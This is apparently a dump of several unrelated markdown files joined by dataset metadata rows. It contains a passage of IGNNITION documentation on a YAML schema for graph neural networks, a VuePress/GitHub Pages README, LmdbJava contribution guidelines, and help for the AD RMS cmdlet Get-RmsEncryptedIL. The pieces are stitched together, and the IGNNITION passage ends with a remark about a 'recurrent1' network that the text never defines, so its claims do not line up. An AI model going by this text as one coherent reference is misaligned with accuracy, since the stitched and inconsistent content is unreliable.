**Description:** Name that we assign to the new entity. This name is important, as we will use it from now on to reference the nodes that belong to this entity.

**Accepted values:** String of the choice of the user. E.g., below we show how we would define an entity named *entity1*.

```yaml
name: entity1
```

---

#### Parameter: state_dim

**Description:** Dimension of the hidden states of the nodes of this entity.

**Accepted values:** Natural number

```yaml
state_dim: 32
```

---

#### Parameter: initial_state

**Description:** Array of Operation objects that incrementally define the initial state.

**Accepted values:** Array of [Operation objects](#operation-object).
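For instance, reusing the *build_state* operation from the entity examples earlier in this document, a minimal *initial_state* definition looks like this (the feature names are placeholders):

```yaml
initial_state:
  - type: build_state
    input: [feature1, feature2]
```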
### Step 2: Message-passing phase

We now define the keywords that the user can use to design the message-passing phase of the *GNN*. To do so, we cover the following keywords:<br>

- [Parameter: num_iterations](#parameter-num_iterations)<br>
- [Parameter: stages](#parameter-stages)

#### Parameter: num_iterations

**Description:** Number of times that all the stages must be repeated (iterations of the message-passing phase).

**Accepted values:** Natural number (normally between 3 and 8)

```yaml
num_iterations: 8
```

---

#### Parameter: stages

**Description:** Array of Stage objects, which together define all the parts of the message passing.

**Accepted values:** Array of [Stage objects](#stage), each of which represents a time-step of the algorithm.

### Stage:

To define a stage, we must define all the single message-passings that take place during that stage (a given time-step of the algorithm). In other words, we define all the single message-passings, each of which describes how the nodes of potentially many entities send messages to a destination entity.

#### Parameter: stage_message_passings

**Description:** Contains the single message-passings (the process of the nodes of one entity sending messages to those of another) that we assign to this stage (time-step of the algorithm).

**Accepted values:** Array of [Single message-passing objects](#single-message-passing).

### Single message-passing:

This object defines how the nodes of potentially many entity types send messages simultaneously to the nodes of a given destination entity. To do so, we must define the following parameters:<br>

- [Parameter: destination_entity](#parameter-destination_entity)<br>
- [Parameter: source_entities](#parameter-source_entities)<br>
- [Parameter: aggregation](#parameter-aggregation)<br>
- [Parameter: update](#parameter-update)

#### Parameter: destination_entity

**Description:** Name of the destination entity of this single message-passing. In other words, the entity whose nodes receive the messages.

**Accepted values:** String. It must match the name of an entity previously defined (see [entity name](#parameter-name)).

```yaml
destination_entity: my_dst_entity
```

---

#### Parameter: source_entities

**Description:** Array of the source entities sending messages to the destination entity (defined above) in this single message-passing. That is, all these sending entities will send messages simultaneously to the defined destination entity.

**Accepted values:** Array of [Source entity objects](#source-entity).

---

#### Parameter: aggregation

**Description:** Defines the aggregation function, which takes as input all the messages received by each of the destination nodes, respectively, and aggregates them together into a single representation. Note that, to allow potentially very complex functions, this is defined as a pipeline of aggregation operations.

**Accepted values:** Array of [Aggregation operations](#aggregation-operation).

---

#### Parameter: update

**Description:** Defines the update function. This function is applied to each of the destination nodes and, given the aggregated input and the current hidden state, produces the updated hidden state.

**Accepted values:** [Update operation](#update-operation).

### Source entity object:

This object ultimately defines how the nodes of a source entity send messages to the destination entity. This definition also includes the [message function](#message-function-object), which specifies how this source entity forms its messages.
To define this object, we must specify the following parameters:

- [Parameter: name](#parameter-name)<br>
- [Parameter: message](#parameter-message)

---

#### Parameter: name

**Description:** Name of the source entity.

**Accepted values:** String. It must match the name of an entity defined previously.

```yaml
name: source1
```

---

#### Parameter: message

**Description:** Message function, which defines how the source entity nodes form the messages to be sent to the destination entity.

**Accepted values:** [Message function](#message-function-object)

#### Message function object:

One of the most important aspects when defining a message passing between a source entity and a destination entity is to specify how the source entities form their messages. To do so, and to support very complex functions, we devise a pipeline of operations, which are specified as [Operation objects](#operation-object). An operation performs some calculation and then returns a reference to its output. By doing so, we can concatenate operations, referencing previous results to obtain increasingly complicated results. Note that the messages will be, by default, the result of the last operation. Take a look at the [Operation objects](#operation-object) subsection to find the operations accepted in this section. We do, however, introduce a new specific *Operation* which can be especially useful to define a message function: the [Direct_assignment](#operation-direct_assignment) operation.

##### Operation: Direct_assignment

This operation simply assigns the source hidden states as the messages to be sent. By using it, hence, each source node will use its hidden state as the message to be sent to each of its neighbouring destination nodes.

```yaml
type: direct_assignment
```

##### Usage example:

Let us put all of this together to see an example of how to define a *source_entity* in which nodes of type *entity1* send their hidden states to the corresponding destination nodes.

```yaml
source_entities:
- name: entity1
  message:
    - type: direct_assignment
```

As mentioned before, however, we might want to form more complicated message functions. Below we show a more complicated example using two [Neural Network operations](#neural-network-operation), which illustrates the power of the pipeline of operations. In this pipeline, we first define a neural network which takes as input the source entity nodes (using the keyword *source*). Then we save the output under the name *my_output1* and reuse it as input of the second neural network, together with each of the destination nodes, respectively. The output of this second neural network (for each of the edges of the graph) will be the message that the source node sends to the destination node.

```yaml
source_entities:
- name: entity1
  message:
    - type: neural_network
      input: [source]
      output_name: my_output1
    - type: neural_network
      input: [my_output1, target]
```

An important note is that, for the definition of neural networks in the message function, *IGNNITION* reserves the keywords *source* and *target*. These keywords are used to reference the hidden states of the source entity nodes (in this case *entity1*) and the hidden states of the destination nodes, respectively.

#### Aggregation operation:

This object defines the *aggregation function a*. That is, a function that, given the *k* input messages *(m_1, ..., m_k)* of a given destination node, produces a single aggregated message for that destination node.
\(aggregated\_message_j = a(m_1, ..., m_k)\)

For this, we provide several keywords that reference the most common aggregation functions used in state-of-the-art *GNNs*, which should be specified as follows:

```yaml
aggregation:
    - type: sum/min/max/ordered/...
```

Below we provide more details on each of these possible aggregation functions, these being:<br>

- [Option 1: sum](#option-1-sum)<br>
- [Option 2: mean](#option-2-mean)<br>
- [Option 3: min](#option-3-min)<br>
- [Option 4: max](#option-4-max)<br>
- [Option 5: ordered](#option-5-ordered)<br>
- [Option 6: attention](#option-6-attention)<br>
- [Option 7: edge_attention](#option-7-edge_attention)<br>
- [Option 8: convolution](#option-8-convolution)<br>
- [Option 9: concat](#option-9-concat)<br>
- [Option 10: interleave](#option-10-interleave)<br>
- [Option 11: neural_network](#option-11-neural_network)

---

##### Option 1: sum

This operation aggregates all the input messages into a single message by summing them together.

\(aggregated\_message_j = \sum_{i \in N(j)} m_i\)

Example:

\(m_1 = [1,2,3]\)

\(m_2 = [2,3,4]\)

\(aggregated\_message_j = [3,5,7]\)

In *IGNNITION*, this operation would be represented as:

```yaml
aggregation:
    - type: sum
```

---

##### Option 2: mean

This operation aggregates all the input messages into a single message by averaging them.

\(aggregated\_message_j = \frac{1}{deg(j)} \sum_{i \in N(j)} m_i\)

Example:

\(m_1 = [1,2,3]\)

\(m_2 = [2,3,4]\)

\(aggregated\_message_j = [1.5,2.5,3.5]\)

In *IGNNITION*, this operation would be defined as:

```yaml
aggregation:
    - type: mean
```

---

##### Option 3: min

This operation aggregates all the input messages into a single message by computing the minimum over all the received messages.

```yaml
aggregation:
    - type: min
```

---

##### Option 4: max

This operation aggregates all the input messages into a single message by computing the maximum over all the received messages.

```yaml
aggregation:
    - type: max
```

---

##### Option 5: ordered

This operation produces an aggregated message which consists of an array of all the input messages. This aggregation is intended to be used with an RNN update function. The *RNN* then automatically updates the hidden state by processing the first message, then the second message, all the way to the *k*-th message.

\(aggregated\_message_j = (m_1|| ... ||m_k)\)

```yaml
aggregation:
    - type: ordered
```

---

##### Option 6: attention

This operation performs the attention mechanism described in the paper [Graph Attention Networks](https://arxiv.org/abs/1710.10903). Hence, given a set of input messages *(m_1, ..., m_k)*, it produces a set of *k* weights *(a_1, ..., a_k)* and then performs a weighted sum to produce a single aggregated message.

\(e_{ij} = \alpha(W * h_i, W * h_j)\)

\(\alpha_{ij} = softmax_j(e_{ij})\)

\(aggregated\_message_j = \sum_{i \in N(j)} m_i * \alpha_{ij}\)

```yaml
aggregation:
    - type: attention
```

---

##### Option 7: edge_attention

This aggregation function performs the edge-attention mechanism described in the paper [Edge Attention-based Multi-Relational Graph Convolutional Networks](https://www.arxiv-vanity.com/papers/1802.04944/). It is based on a variation of the previous *attention* strategy, where we follow a different approach to produce the weights *(a_1, ..., a_k)*. We similarly end up producing the aggregated message through a weighted sum of the input messages and the computed weights.
\(e_{ij} = f(m_i, m_j)\)

\(aggregated\_message_j = \sum_{i \in N(j)} e_{ij} * m_i\)

Notice that this aggregation requires a neural network *f* that computes an attention weight for each of the neighbours of a given destination node, respectively. Consequently, in this case we need to include a new parameter *nn_name*, as defined in [nn_name](#parameter-nn_name). In this field, we must include the name of the NN, which we define later on (as done for any NN). In this case, however, remember that this NN must return a single value; in other words, the number of units of the last layer of the network must be 1. This is because we want to obtain a single value representing the weight of each of the edges, respectively.

```yaml
aggregation:
    - type: edge_attention
      nn_name: my_network
```

---

##### Option 8: convolution

This aggregation function performs the very popular convolution mechanism described in the paper [Semi-supervised classification with Graph Convolutional Networks](https://arxiv.org/pdf/1609.02907.pdf). Again, we aim to find a set of weights *(a_1, ..., a_k)* for the *k* input messages of a given destination node. In this case, it follows the formulation below.

\(aggregated\_message_j = \sum_{i \in N(j)} \frac{1}{\sqrt{deg_i * deg_j}} * h_i * W\)

```yaml
aggregation:
    - type: convolution
```

---

##### Option 9: concat

This aggregation function is specially thought for the cases in which we have a list of messages sent from nodes of entity type *entity1* and a list of messages from nodes of entity type *entity2*. This aggregation function concatenates these two lists along the axis indicated in the field *concat_axis*. Then, similarly to the *ordered* function, we would pass the result to an *RNN*, which updates itself iteratively with all the messages received.

###### Parameter: concat_axis

**Description:** Axis to use for the concatenation.

**Accepted values:** 1 or 2

Given the two lists of messages \([[1,2,3],[4,5,6]]\) from *entity1* and \([[4,5,6],[1,2,3]]\) from *entity2*:

If concat_axis = 1, we will get a new message \(aggregated\_message_j = [[1,2,3,4,5,6], [4,5,6,1,2,3]]\)

If concat_axis = 2, we will get a new message \(aggregated\_message_j = [[1,2,3], [4,5,6],[4,5,6],[1,2,3]]\)

---

##### Option 10: interleave

**Description:** To be completed.

```yaml
aggregation:
    - type: interleave
```

---

##### Option 11: neural_network

**Description:** So far we have looked at examples where the aggregation function is defined with a single operation (e.g., max, min, mean...). On some occasions, however, we must build more complicated functions. This operation thus allows us to take the results of previous operations and pass them through a NN to compute a new value.

**Accepted values:** [Neural network operation](#operation-2-neural_network)

**Example of use:**<br>

In this case, we need to include the parameter *output_name* at the end of each of the operations that precede the neural network. This stores each of the results of those operations, which we can then reference in the *neural network operation*. Let us see this with an example:

```yaml
aggregation:
    - type: max
      output_name: max_value
    - type: min
      output_name: min_value
    - type: attention
      output_name: attention_value
    - type: neural_network
      input: [max_value, min_value, attention_value]
      nn_name: aggregation_function
```

In this example we compute the max value, the min value and the result of applying the attention mechanism to the messages received by each of the destination nodes, respectively.
Then, the neural network takes as input the results of each of the previous operations and computes the final aggregated message, which is used for the update.

#### Update operation:

In order to define the update function, we must specify a *Neural Network*. Note that the syntax is the same no matter whether the *NN* is a *feed-forward NN* or an *RNN*. To define it, we must only specify two fields: the *type* and the *nn_name*.<br>

- [Parameter: type](#parameter-type)<br>
- [Parameter: nn_name](#parameter-nn_name)

##### Parameter: type

**Description:** This parameter indicates the type of update function to be used.

**Accepted values:** Right now the only accepted keyword is *neural_network*. We will, however, soon include new keywords.

##### Parameter: nn_name

**Description:** Name of the neural network to be used for the update.

**Accepted values:** String. The name should match a *NN* created in [Step 4](#step-4-neural-network-architectures).

Below we present an example of how an update function can be defined. Note that in this case the update uses the *NN* named *my_neural_network*, whose architecture must be defined later.

```yaml
update:
    type: neural_network
    nn_name: my_neural_network
```

### Step 3: Readout

Just as in the case of the message function, the readout function can potentially be very complex, so we follow a similar approach. We define the readout as a pipeline of [Operation objects](#operation-object), which allows us to define very complex functions. Again, each of the operations keeps the field *output_name*, indicating the name with which we can reference/use the result of that operation in successive operations.

The main particularity of the readout definition is that one of the operations (normally the last one) must include the name of the *output_label* that we aim to predict. To do so, include the keyword presented below as a property of the last *Operation* of your readout function (the output of which will be used as the output of the *GNN*). Another important consideration is that, in this case, the user can use *entity1_initial_state* as part of the input of an operation (where *entity1* can be replaced by any entity name of the model). With this, the operation takes as input the initial hidden states that were initialized at the beginning of the execution, and thus before the message-passing phase.

#### Parameter: output_label

**Description:** Name referencing the labels that we want to predict, which must be defined in the dataset.

**Allowed values:** Array of strings. The names should match the labels specified in the dataset.

Let us see this with a brief example of a simple readout function based on two [Neural Network operations](#neural-network-operation). In this case we first apply a neural network to each of the nodes of type *entity1*. The output is then concatenated together with each of the nodes of type *entity2* (as long as there is the same number of nodes of each entity) and passed to the second neural network *my_network2*. Note that the last operation includes the definition of *my_label*, which is the name of the label found in the dataset. To specify this label, we write *$my_label* so as to indicate that this keyword refers to data that *IGNNITION* can find in the corresponding dataset.
```yaml
readout:
- type: neural_network
  input: [entity1]
  nn_name: my_network1
  output_name: output1
- type: neural_network
  input: [output1, entity2]
  nn_name: my_network2
  output_label: [$my_label]
```

Notice, however, that *output_label* may contain more than one label. For instance, consider the case in which we want the readout function to predict two properties of a node, namely *label1* and *label2*. For simplicity, let us consider these labels to be single values (even though the same procedure applies when they represent 1-d arrays). For this, we make the following adaptations of the previous model:

```yaml
readout:
- type: neural_network
  input: [entity1]
  nn_name: my_network1
  output_name: output1
- type: neural_network
  input: [output1, entity2]
  nn_name: my_network2
  output_label: [$label1, $label2]
```

In this case, hence, *my_network2* will output two predictions, one for each of the target labels. *IGNNITION* will then internally process this and backpropagate accordingly, so as to force the GNN to learn to predict both properties simultaneously.

### Operation object:

We now review the different *Operations* that *IGNNITION* allows, which can be used in many parts of the *GNN* (e.g., message function, update function, readout function...). All these possible operations are:<br>

- [Operation 1: product](#operation-1-product)<br>
- [Operation 2: neural_network](#operation-2-neural_network)<br>
- [Operation 3: pooling](#operation-3-pooling)

---

#### Operation 1: product

This operation performs the product of two different inputs. Let us go through the different parameters that we can tune to customize this operation.<br>

- [Parameter: input](#parameter-input)<br>
- [Parameter: output_name](#parameter-output_name)<br>
- [Parameter: type_product](#parameter-type_product)

---

##### Parameter: input

**Description:** Defines the set of inputs to be fed to this operation.

**Allowed values:** Array of two strings, defining the two inputs of the *product operation*. Notice that if a string from the input references a feature from the dataset, the name must always be preceded by a # symbol. This indicates to *IGNNITION* that such a keyword references a value present in the dataset.

---

##### Parameter: output_name

**Description:** Defines the name by which we can reference the output of this operation in successive operations.

**Allowed values:** String

---

##### Parameter: type_product

**Description:** Defines the type of product that we use (e.g., element-wise, matrix multiplication, dot-product).

**Allowed values:** [dot_product, element_wise, matrix_mult]

Let us explain in more detail what each of these keywords stands for:<br>

- [Option 1: dot_product](#option-1-dot_product)<br>
- [Option 2: element_wise](#option-2-element_wise)<br>
- [Option 3: matrix_mult](#option-3-matrix_mult)

---

###### Option 1: dot_product

**Description:** Computes the dot product between two inputs *a* and *b*. Note that if the inputs are two arrays *a = (a_1, a_2, ... , a_k)* and *b = (b_1, b_2, ... , b_k)*, then the dot product is applied to *a_i* and *b_i*, respectively.

**Allowed values:** String. Name of an entity or output of a previous operation.

Below we show an example of a readout function which first computes the *dot_product* between the nodes of type *entity1* and *entity2*, respectively. The result of this operation is then passed to a *Neural Network* that computes the prediction.
```yaml
readout:
- type: product
  type_product: dot_product
  input: [entity1, entity2]
  output_name: output1
- type: neural_network
  input: [output1, entity2]
  nn_name: my_network2
  output_label: [$my_label]
```

---

###### Option 2: element_wise

**Description:** Computes the element-wise multiplication between two inputs *a* and *b*. Note that if the inputs are two arrays *a = (a_1, a_2, ... , a_k)* and *b = (b_1, b_2, ... , b_k)*, then the element-wise multiplication is applied to *a_i* and *b_i*, respectively.

**Allowed values:** String. Name of an entity or output of a previous operation.

Below we show an example of a readout function which first computes the *element_wise* multiplication between the nodes of type *entity1* and *entity2*, respectively. The result of this operation is then passed to a *Neural Network* that computes the prediction.

```yaml
readout:
- type: product
  type_product: element_wise
  input: [entity1, entity2]
  output_name: output1
- type: neural_network
  input: [output1, entity2]
  nn_name: my_network2
  output_label: [$my_label]
```

---

###### Option 3: matrix_mult

**Description:** Computes the matrix multiplication between two inputs *a* and *b*. Note that if the inputs are two arrays *a = (a_1, a_2, ... , a_k)* and *b = (b_1, b_2, ... , b_k)*, then the matrix multiplication is applied to *a_i* and *b_i*, respectively.

**Allowed values:** String. Name of an entity or output of a previous operation.

The definition follows the same pattern as the two previous examples, simply setting *type_product* to *matrix_mult*.

---

#### Operation 2: neural_network

Similarly to the neural_network operations used in the *message* or the *update* function, we just need to reference the neural network to be used and provide a name for the output. Then, given some input \(a\) and a neural network that we define \(f\), this operation performs the following:

\(output\_name = f(a)\)

Below we show a code snippet of what a *neural_network* operation would look like, and afterwards we present each of its possible options. This neural network takes as input all the states of the nodes of type *entity1* and passes them (separately) to our *NN* named *my_network*. Finally, it stores the result in *my_output*.

```yaml
- type: neural_network
  input: [entity1]
  nn_name: my_network
  output_name: my_output
```

We can now review in more depth each of its available parameters:<br>

- [Parameter: input](#parameter-input)<br>
- [Parameter: nn_name](#parameter-nn_name)<br>
- [Parameter: output_name](#parameter-output_name)

---

##### Parameter: input

**Description:** Defines the set of inputs to be fed to this operation.

**Allowed values:** Array of strings. If this neural network is part of the readout, you can use *entity1_initial_state* to reference the initial values of the hidden states of *entity1*. Note that *entity1* can be replaced by any entity name of the model. An important consideration is that all the strings in the input that reference a feature (that is, a value present in the dataset) must be preceded by a # symbol. This indicates to *IGNNITION* that such a keyword references a value from the dataset.

---

##### Parameter: nn_name

**Description:** Name of the neural network \(f\), whose actual architecture is then defined in [Step 4](#step-4-internal-neural-networks).

**Allowed values:** String.
This name should match one of the neural networks defined.

---

##### Parameter: output_name

**Description:** Defines the name by which we can reference the output of this operation, to be used in successive operations.

**Allowed values:** String

An example of the use of this operation is the following *message* function (based on a pipeline of two different operations):

```yaml
message:
    - type: neural_network
      input: [entity1]
      nn_name: my_network1
      output_name: my_output
    - type: neural_network
      input: [my_output]
      nn_name: my_network2
```

With this, we apply two successive neural networks, which is just a glimpse of the powerful operations that we can define.

---

#### Operation 3: pooling

The use of this operation is key to making global predictions (over the whole graph) instead of node predictions. It allows us to take a set of inputs \(a_1, ... , a_k\) and a defined function \(g\), and obtain a single resulting output. This is:

\(output\_name = g(a_1, ..., a_k)\)

For this, we must define, as usual, the *output_name* field, where we specify the name for the output of this operation. Additionally, we must specify which function \(g\) we want to use.

Let us see what this operation would look like if used to define a *readout* function that makes global predictions over a graph. In this example we again define a pipeline of operations: first we pool all the nodes of type *entity1* together into a single representation (which is stored in *my_output*). Then we define a neural network operation which takes this pooled representation as input and applies it to a *NN* that aims to predict our label *my_label*.

```yaml
readout:
- type: pooling
  type_pooling: sum/mean/max
  input: [entity1]
  output_name: my_output
- type: neural_network
  input: [my_output]
  nn_name: readout_model
  output_label: [$my_label]
```

We now present the new keyword that is characteristic of this specific operation:

##### Parameter: type_pooling

**Description:** This field defines the pooling operation that we want to use to reduce a set of inputs \(a_1, ... , a_k\) to a single resulting output.

**Allowed values:** Let us explain in depth each of the possible types of pooling that *IGNNITION* currently supports:<br>

- [Option 1: sum](#option-1-sum)<br>
- [Option 2: max](#option-2-max)<br>
- [Option 3: mean](#option-3-mean)

---

###### Option 1: sum

This operation takes the whole set of inputs \(a_1, ... , a_k\) and sums them all together.

\(output\_name = \sum(a_1, ... , a_k)\)

```yaml
- type: pooling
  type_pooling: sum
  input: [entity1]
```

---

###### Option 2: max

This operation takes the whole set of inputs \(a_1, ... , a_k\) and outputs their maximum.

\(output\_name = \max(a_1, ... , a_k)\)

```yaml
- type: pooling
  type_pooling: max
  input: [entity1]
```

---

###### Option 3: mean

This operation takes the whole set of inputs \(a_1, ... , a_k\) and calculates their average.

\(output\_name = \frac{1}{k} \sum(a_1, ... , a_k)\)

```yaml
- type: pooling
  type_pooling: mean
  input: [entity1]
```

### Step 4: Neural Network architectures

In this section we define the architecture of the neural networks that we referenced in all the previous sections. For this, we just need to define an array of [Neural Network objects](#neural-network-object). Note that we use the very same syntax to define either a *feed-forward NN* or a *recurrent NN*.
Let us describe what a [Neural Network object](#neural-network-object) looks like:

#### Neural Network object

A Neural Network object defines the architecture of a specific neural network. To do so, we must define two main fields, *nn_name* and *nn_architecture*, which we describe below.

We can now review in more depth each of its available parameters:<br>

- [Parameter: nn_name](#parameter-nn_name)<br>
- [Parameter: nn_architecture](#parameter-nn_architecture)

---

##### Parameter: nn_name

**Description:** Name of the neural network.

**Accepted values:** String. This name must match all the references to this neural network from all the previous sections (e.g., the *NN* in the example below is named *my_neural_network*).

---

##### Parameter: nn_architecture

**Description:** Definition of the actual architecture of the *NN*.

**Accepted values:** Array of Layer objects (e.g., a single *Dense* layer in the example below).

For the sake of illustration, let us provide a simple example of how a *Neural Network* object can be defined:

```yaml
neural_networks:
- nn_name: my_neural_network
  nn_architecture:
  - type_layer: Dense
    units: readout_units
```

#### Layer object

To define a layer, we rely greatly on the well-known [tf.keras library](https://www.tensorflow.org/api_docs/python/tf/keras/layers). Consequently, we just require the user to define the following field.

---

##### Parameter: type_layer

**Description:** Here we must indicate the type of layer to be used. Please write only layers accepted by the [tf.keras.layers library](https://www.tensorflow.org/api_docs/python/tf/keras/layers), using the same syntax.

**Allowed values:** String. It must match a layer from the *tf.keras.layers* library.

```yaml
- type_layer: Dense/Softmax/...
  ...
```

##### Other parameters

Additionally, the user can define any other parameter from the [tf.keras library](https://www.tensorflow.org/api_docs/python/tf/keras/layers) corresponding to the type of layer defined. Note that on many occasions the user is in fact required to define layer-specific attributes (e.g., the number of units when creating a Dense layer). Thus, please make sure to define all mandatory parameters and then, additionally, define optional parameters if needed. E.g., if we define a Dense layer, we must first define the required parameter *units* (as specified by TensorFlow). Then, we can also define any optional parameter of the Dense class (visit the [documentation](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Dense)), such as the activation or the use of bias.

```yaml
- type_layer: Dense
  units: 32
  activation: relu
  use_bias: False
```
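Since the update function in Step 2 referenced a recurrent network (*recurrent1*) but no recurrent example has been shown, here is a hypothetical sketch of how such a network could be declared with the very same syntax. The choice of a *GRU* layer is an illustrative assumption; any recurrent layer from *tf.keras.layers* should follow the same pattern.

```yaml
neural_networks:
- nn_name: recurrent1
  nn_architecture:
  # hypothetical: a single GRU layer; its number of units would normally
  # match the state dimension of the destination entity it updates
  - type_layer: GRU
    units: 32
```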
55.826437
1,181
0.754514
eng_Latn
0.998144
53a6588e2d5a043ef67a2642f2d534104917215b
1,824
md
Markdown
README.md
leoxiaoge/leoxiaoge.github.io
db177ce7b1097fa17462cca60d497593b1a38976
[ "Apache-2.0" ]
null
null
null
README.md
leoxiaoge/leoxiaoge.github.io
db177ce7b1097fa17462cca60d497593b1a38976
[ "Apache-2.0" ]
13
2020-04-24T07:26:35.000Z
2022-02-27T02:46:06.000Z
README.md
leoxiaoge/leoxiaoge.github.io
db177ce7b1097fa17462cca60d497593b1a38976
[ "Apache-2.0" ]
null
null
null
### Quick start ``` <script data-ad-client="ca-pub-7005086867582992" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> ``` npx ``` npx @vuepress-reco/theme-cli init my-blog ``` npm ``` # init npm install @vuepress-reco/theme-cli -g theme-cli init my-blog # install cd my-blog npm install # run npm run dev # build npm run build ``` yarn ``` # init yarn global add @vuepress-reco/theme-cli theme-cli init my-blog # install cd my-blog yarn install # run yarn dev # build yarn build ``` ## Welcome to GitHub Pages You can use the [editor on GitHub](https://github.com/leoxiaoge/leoxiaoge.github.io/edit/master/README.md) to maintain and preview the content for your website in Markdown files. Whenever you commit to this repository, GitHub Pages will run [Jekyll](https://jekyllrb.com/) to rebuild the pages in your site, from the content in your Markdown files. ### Markdown Markdown is a lightweight and easy-to-use syntax for styling your writing. It includes conventions for ```markdown Syntax highlighted code block # Header 1 ## Header 2 ### Header 3 - Bulleted - List 1. Numbered 2. List **Bold** and _Italic_ and `Code` text [Link](url) and ![Image](src) ``` For more details see [GitHub Flavored Markdown](https://guides.github.com/features/mastering-markdown/). ### Jekyll Themes Your Pages site will use the layout and styles from the Jekyll theme you have selected in your [repository settings](https://github.com/leoxiaoge/leoxiaoge.github.io/settings). The name of this theme is saved in the Jekyll `_config.yml` configuration file. ### Support or Contact Having trouble with Pages? Check out our [documentation](https://help.github.com/categories/github-pages-basics/) or [contact support](https://github.com/contact) and we’ll help you sort it out.
21.714286
256
0.741776
eng_Latn
0.915865
53a6b14ee1d77753a74df23db3d5fd27cbef4a84
361
md
Markdown
CONTRIBUTING.md
bubblegumproject/lmdbjava
6a3f8acfdbd9fac946e53dac41d01997646c5cf2
[ "Apache-2.0" ]
664
2016-06-30T12:38:07.000Z
2022-03-31T16:31:47.000Z
CONTRIBUTING.md
bubblegumproject/lmdbjava
6a3f8acfdbd9fac946e53dac41d01997646c5cf2
[ "Apache-2.0" ]
190
2016-06-06T13:32:02.000Z
2022-03-24T01:29:18.000Z
CONTRIBUTING.md
bubblegumproject/lmdbjava
6a3f8acfdbd9fac946e53dac41d01997646c5cf2
[ "Apache-2.0" ]
115
2016-07-01T21:20:21.000Z
2022-03-23T09:58:04.000Z
# Contributing Guidelines We welcome patches and pull requests to improve LmdbJava. **Before submitting a PR, please run `mvn clean verify`**. This will run: * Tests * Initial Test Coverage * Checkstyle * PMD * FindBugs * XML Formatting * License Header Management `mvn clean verify` is also run by CI, but it's quicker and easier to run before submitting.
20.055556
72
0.759003
eng_Latn
0.992789
53a6dfe8bb24491fe5bebb42a98c791f34a47597
3,853
md
Markdown
docset/winserver2012r2-ps/adrmsadmin/Get-RmsEncryptedIL.md
machgo/windows-powershell-docs
198d5270da7d72d35bfeb27326c6d322ba358f3b
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
1
2021-05-15T11:23:46.000Z
2021-05-15T11:23:46.000Z
docset/winserver2012r2-ps/adrmsadmin/Get-RmsEncryptedIL.md
machgo/windows-powershell-docs
198d5270da7d72d35bfeb27326c6d322ba358f3b
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
null
null
null
docset/winserver2012r2-ps/adrmsadmin/Get-RmsEncryptedIL.md
machgo/windows-powershell-docs
198d5270da7d72d35bfeb27326c6d322ba358f3b
[ "CC-BY-3.0", "CC-BY-4.0", "MIT" ]
1
2018-11-30T02:02:05.000Z
2018-11-30T02:02:05.000Z
--- external help file: Microsoft.RightsManagementServices.Admin.dll-Help.xml Module Name: ADRMSAdmin online version: schema: 2.0.0 title: Get-RmsEncryptedIL description: keywords: powershell, cmdlet author: brianlic manager: alanth ms.date: 2017-10-30 ms.topic: reference ms.prod: powershell ms.technology: powershell ms.assetid: 0E60DBB0-CC4A-4D2E-832E-970657361CA3 --- # Get-RmsEncryptedIL ## SYNOPSIS Returns use-license information from an issuance license used in a user request for the Active Directory Rights Management Services (AD RMS) cluster. ## SYNTAX ``` Get-RmsEncryptedIL -ILCertificateId <String> [-Path] <String[]> [-WhatIf] [-Confirm] [<CommonParameters>] ``` ## DESCRIPTION This cmdlet generates a report containing information about an issuance license used in a user request on the Active Directory Rights Management Services (AD RMS) cluster. You must be logged in as an Enterprise Administrator to use this cmdlet. To obtain licenses, specify the ILCertificateID of the certificate for which you want to obtain use-license information and then set the Path parameter to the AD RMS provider drive subpath "\<PSDrive\>:\Report" where \<PSDrive\> is the provider drive ID. You can also specify a relative path. For example, "." specifies the current location. Use the Get-RmsCertChain cmdlet to obtain the ILCertificateID of the certificate for which you want to obtain use-license information. The ILCertificateID value returned is valid only for the cluster identified by the Path parameter of Get-RmsCertChain. You cannot use an ILCertificateID to identify the same certificate in different clusters. ## EXAMPLES ### -------------- EXAMPLE 1 -------------- ``` C:\PS>Get-RmsEncryptedIL -Path . -ILCertificateId "YJ3HGsG/ADg3rLm5LwWGgpAJmz4=" | Out-File -FilePath C:\temp\RightsPolicyData.xml ``` This command returns use-license information from an issuance license and saves the results in a file. ## PARAMETERS ### -Confirm Prompts you for confirmation before running the cmdlet. ```yaml Type: SwitchParameter Parameter Sets: (All) Aliases: cf Required: False Position: Named Default value: False Accept pipeline input: False Accept wildcard characters: False ``` ### -ILCertificateId Specifies the issuance license certificate hash ID. ```yaml Type: String Parameter Sets: (All) Aliases: Required: True Position: Named Default value: None Accept pipeline input: True (ByPropertyName, ByValue) Accept wildcard characters: False ``` ### -Path Specifies a provider drive and path or relative path on the current drive. This parameter is required. Use a dot (.) to specify the current location. This parameter does not accept wildcards and has no default value. ```yaml Type: String[] Parameter Sets: (All) Aliases: Required: True Position: 0 Default value: None Accept pipeline input: False Accept wildcard characters: False ``` ### -WhatIf Shows what would happen if the cmdlet runs. The cmdlet is not run. ```yaml Type: SwitchParameter Parameter Sets: (All) Aliases: wi Required: False Position: Named Default value: False Accept pipeline input: False Accept wildcard characters: False ``` ### CommonParameters This cmdlet supports the common parameters: -Debug, -ErrorAction, -ErrorVariable, -InformationAction, -InformationVariable, -OutVariable, -OutBuffer, -PipelineVariable, -Verbose, -WarningAction, and -WarningVariable. For more information, see about_CommonParameters (http://go.microsoft.com/fwlink/?LinkID=113216). 
## INPUTS ## OUTPUTS ## NOTES ## RELATED LINKS [Using Windows PowerShell with AD RMS](http://go.microsoft.com/fwlink/?LinkId=136806) [Get-RmsCertChain](./Get-RmsCertChain.md) [Get-RmsCertInfo](./Get-RmsCertInfo.md) [Get-RmsChildCert](./Get-RmsChildCert.md) [Get-RmsRequestInfo](./Get-RmsRequestInfo.md) [Get-RmsUserRequestReport](./Get-RmsUserRequestReport.md)
27.719424
314
0.772645
eng_Latn
0.769601
53a88ca7d8cf701697f806ac10faf0a5820311ce
575
md
Markdown
site/conferences/2021-an-event-apart-spring-summit-.md
Le0101/conferences
43d7d4d03617f9ca6e013cd22cf7a2cc850af205
[ "MIT" ]
null
null
null
site/conferences/2021-an-event-apart-spring-summit-.md
Le0101/conferences
43d7d4d03617f9ca6e013cd22cf7a2cc850af205
[ "MIT" ]
2
2022-02-07T23:54:54.000Z
2022-02-28T01:40:44.000Z
site/conferences/2021-an-event-apart-spring-summit-.md
Le0101/conferences
43d7d4d03617f9ca6e013cd22cf7a2cc850af205
[ "MIT" ]
null
null
null
